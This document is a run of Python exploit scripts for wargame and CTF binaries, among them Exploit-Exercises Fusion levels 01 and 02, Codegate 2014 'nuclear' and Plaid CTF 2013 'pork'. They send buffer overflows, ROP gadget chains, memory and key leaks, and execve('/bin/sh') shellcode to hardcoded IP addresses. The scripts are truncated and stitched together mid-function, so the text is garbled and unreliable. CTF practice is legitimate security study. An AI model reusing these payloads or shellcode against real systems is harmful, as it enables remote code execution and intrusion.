# exploit-ex fusion level01
from err0rless import connst, dump
from struct import pack
s, t = connst("192.168.95.152", 20001)
sc = ("\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68"
"\x68\x2F\x62\x69\x6E\x89\xE3\x31\xC9\xCD\x80")
# $ ./ROPgadget -file /opt/fusion/bin/level01 -g -asm "jmp *%esp"
# 0x08049f4f: "\xff\xe4 <==> jmp *%esp"
# 0x080483eb: ff d6 call *%esi
def pMain():
p = "A" * 139
p += pack("I", 0x08049f4f) # jmp esp
p += "\x90\x90\xFF\xD6" # jmp esi opcode
s.send("GET " + p + " HTTP/1.1" + sc + "\n")
t.interact()
if __name__ == "__main__":
pMain()
# exploit-ex fusion level02
from err0rless import connst
from struct import pack
s, t = connst("192.168.95.152", 20002)
def leak_keybuf():
s.send("E" + pack("I", 128) + "\x00" * 128)
s.recv(1024)
key = s.recv(1024)[-128:]
return key
def cipher(str, key):
enc = ""
for i in range(len(str)):
enc += chr(ord(key[i % 128]) ^ ord(str[i]))
return enc
def pMain():
xorkey = leak_keybuf()
execp = "/bin/sh\x00" # "/bin/sh"
execp += pack("I", 0x0804B484) # {"/bin/sh", 0}
execp += pack("I", 0x00000000)
p = "A" * (32 * 4096 + 0x10)
# Codegate 2014 Junior Pwnable nuclear
from err0rless import connst, dump
from struct import pack, unpack
s, t = connst("192.168.95.150", 1129)
# http://shell-storm.org/shellcode/files/shellcode-881.php
# delete `dec %eax`, dup(2) -> dup(4)
sc = ("\x6A\x04\x5B\x6A\x29\x58\xCD\x80\x89\xC6"
"\x31\xC9\x56\x5B\x6A\x3F\x58\xCD\x80\x41\x80"
"\xF9\x03\x75\xF5\x6A\x0B\x58\x99\x52\x31\xF6"
"\x56\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E"
"\x89\xE3\x31\xC9\xCD\x80")
def leakPasscode():
print t.read_until("> ")
s.send("target\n")
print s.recv(1024)
s.send("0.1/0.1\n")
print t.read_until("> ")
s.send("A" * 0x200 + "\n")
passcode = s.recv(1024)[0x220-2:-2]
return passcode
def pMain():
passcode = leakPasscode()
print t.read_until("> ")
from err0rless import connst
from struct import pack, unpack
s, t = connst("61.105.8.2", 11013)
#s, t = connst("192.168.36.130", 11013)
# ppppr 0x08048F4C
def pMain():
print t.read_until("Option: ")
s.send("4\n")
print s.recv(1024)
s.send("1\n")
print s.recv(1024)
s.send("1\n")
p = pack("I", 0x08048882)
p += pack("I", 0x08048986)
p += pack("I", 0x0804B1B8)
print s.recv(1024)
s.send("A" * 58 + pack("I", 0x0804B1B4) + p)
p = pack("I", 0x08048540) # write
p += pack("I", 0x08048F4C + 3)
p += pack("I", 0x0804B010)
p += pack("I", 0x080484E0) # read
# Plaid CTF 2013 Pwnable pork
from err0rless import connst
from struct import pack, unpack
from time import sleep
s, t = connst("192.168.95.150", 33227)
sc = ("\x6A\x04\x5B\x6A\x29\x58\xCD\x80\x89\xC6"
"\x31\xC9\x56\x5B\x6A\x3F\x58\xCD\x80\x41\x80"
"\xF9\x03\x75\xF5\x6A\x0B\x58\x99\x52\x31\xF6"
"\x56\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E"
"\x89\xE3\x31\xC9\xCD\x80")
read_gadgets = [
0x804ac98, # point read.plt
0x8049a58,
0x8048b31,
0x8049910,
0x8049990, # bss + 0x50
0x8049910,
0x8049b70,
0x8049b70,
0x8049b70, # 0x00000004
0x8049a58,
0x8048b31,
0x8049910,
0x8049990, # bss + 0x50
0x8049a28,
0x8049b70,
0x8049b70,
0x8049b70
